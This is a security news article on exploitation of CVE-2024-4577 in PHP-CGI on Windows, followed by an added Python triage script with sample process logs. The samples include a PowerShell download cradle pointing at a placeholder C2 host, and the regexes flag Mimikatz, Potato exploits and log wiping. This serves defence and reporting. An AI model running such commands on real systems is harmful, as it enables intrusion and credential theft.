Threat Actors Use PHP-CGI RCE Vulnerability to Target Windows Machines

A recent cybersecurity threat has emerged where attackers are exploiting a critical remote code execution (RCE) vulnerability in PHP-CGI implementations on Windows, specifically targeting organizations in Japan.

The vulnerability, identified as CVE-2024-4577, allows attackers to execute arbitrary PHP code on vulnerable servers by leveraging the “Best-Fit” behavior in Windows code pages.

Because of this behavior, certain characters in the request are converted and then interpreted by PHP-CGI as command-line options, enabling code execution when Apache runs a vulnerable PHP-CGI setup.

Exploitation and Post-Exploitation Activities

The attackers use a publicly available Python script, “PHP-CGI_CVE-2024-4577_RCE.py,” to exploit this vulnerability.

Once successful, they execute a PowerShell command embedded in the PHP code, which downloads and runs a PowerShell injector script from a command and control (C2) server.

This script injects and executes Cobalt Strike reverse HTTP shellcode, providing remote access to the compromised machine.

Figure: snippet of the Cobalt Strike reverse HTTP shellcode.

The attackers then conduct reconnaissance, gather system details, and escalate privileges using exploits like JuicyPotato, RottenPotato, and SweetPotato.

They establish persistence by modifying registry keys and creating scheduled tasks using plugins from the Cobalt Strike “TaoWu” kit.

The attackers also prepare for lateral movement using tools like “fscan.exe” for network scanning and “Seatbelt.exe” for host enumeration.

They attempt to abuse Group Policy Objects (GPOs) to execute malicious scripts across the network.

Additionally, they use Mimikatz to dump and exfiltrate passwords and NTLM hashes from memory.

The attackers erase event logs to maintain stealth, employing the “wevtutil.exe” command to clear Windows security, system, and application logs.
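As an added example (not code from the article or from Cisco Talos), the Python below triages constructed Sysmon-style process-creation records against the chain described above: php-cgi.exe spawning a shell, a PowerShell download cradle, a Potato-family privilege escalation, fscan/Seatbelt discovery, Mimikatz, and wevtutil log clearing. The host names, paths, the C2 placeholder and the severity rule are assumptions.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation records (not from the article);
# fields: host | parent image | image | command line.
SAMPLE_EVENTS = """\
web01|C:\\php\\php-cgi.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://C2-PLACEHOLDER/inject.ps1')"
web01|C:\\Windows\\System32\\cmd.exe|C:\\Users\\Public\\JuicyPotato.exe|JuicyPotato.exe
web01|C:\\Windows\\System32\\cmd.exe|C:\\Users\\Public\\fscan.exe|fscan.exe
web01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\wevtutil.exe|wevtutil.exe cl Security
web01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\wevtutil.exe|wevtutil.exe clear-log System
file02|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt
"""

# (stage label, case-insensitive regex over the command line); tune per environment.
RULES = [
    ("execution: PowerShell download cradle",
     r"powershell.*(downloadstring|downloadfile|invoke-webrequest|\biex\b|-enc)"),
    ("privilege-escalation: Potato-family exploit", r"(juicy|rotten|sweet)potato"),
    ("discovery: fscan / Seatbelt", r"\b(fscan|seatbelt)\.exe"),
    ("credential-access: Mimikatz", r"mimikatz|sekurlsa::"),
    ("defense-evasion: event log clearing",
     r"wevtutil(\.exe)?\s+(cl|clear-log)\s+(security|system|application)\b|clear-eventlog"),
]

def classify(parent, image, cmdline):
    """Return the stage labels one process-creation record matches."""
    hits = []
    # The article's entry point: php-cgi.exe is not a legitimate parent of a shell.
    if re.search(r"php-cgi\.exe$", parent, re.I) and \
            re.search(r"\\(cmd|powershell)\.exe$", image, re.I):
        hits.append("initial-access: php-cgi.exe spawned a shell")
    hits += [label for label, pat in RULES if re.search(pat, cmdline, re.I)]
    return hits

def triage(log_text):
    """Group hits per host; log clearing on top of other stages rates high."""
    per_host = defaultdict(list)
    for line in log_text.splitlines():
        host, parent, image, cmdline = line.split("|", 3)
        hits = classify(parent, image, cmdline)
        if hits:
            per_host[host].extend(hits)
    report = {}
    for host, stages in per_host.items():
        wiped = any(s.startswith("defense-evasion") for s in stages)
        severity = "high" if wiped and len(set(stages)) > 1 else "medium"
        report[host] = {"stages": stages, "severity": severity}
    return report
```

Hosts with no hits are omitted from the report; a host showing only log clearing is rated medium because the earlier stages may have been wiped from the local logs, which is why forwarding events off-host matters.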

Misuse of Legitimate Tools and Frameworks

The attackers have been observed misusing legitimate tools and frameworks hosted on an Alibaba cloud container registry.

A pre-configured installer script, “LinuxEnvConfig.sh,” is used to set up various offensive security frameworks, including Vulfocus, Asset Reconnaissance Lighthouse (ARL), Viper C2, Starkiller, BeEF, and Blue-Lotus.

Figure: menu-driven interface of the LinuxEnvConfig installer script.

According to the Cisco Talos report, these tools are packaged as Docker containers and can be used for malicious purposes such as cross-site scripting, browser exploitation, and remote command execution.

The attackers’ tactics show similarities with previous attacks by groups like “Dark Cloud Shield,” although attribution remains uncertain.

The exploitation of such vulnerabilities highlights the ongoing trend of threat actors targeting vulnerable public-facing applications for initial access.

Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.